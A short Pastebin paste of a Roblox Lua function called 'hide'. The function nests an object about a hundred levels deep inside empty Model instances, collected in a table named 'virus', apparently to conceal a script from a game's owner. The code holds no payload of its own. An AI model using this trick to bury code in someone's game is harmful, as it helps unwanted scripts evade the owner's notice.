jordan83221

Hide

Sep 23rd, 2015
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.33 KB | None | 0 0
  1. local function hide(mod)
  2.     local virus={}
  3.     local models=Instance.new("Model")
  4.     table.insert(virus,models)
  5.     models.Parent=workspace
  6.     for i=1,100 do
  7.         local newModel=models:Clone()
  8.         newModel.Parent=virus[i]
  9.         table.insert(virus,newModel)
  10.     end
  11.     mod.Parent=virus[#virus]
  12. end
Advertisement
Add Comment
Please, Sign In to add comment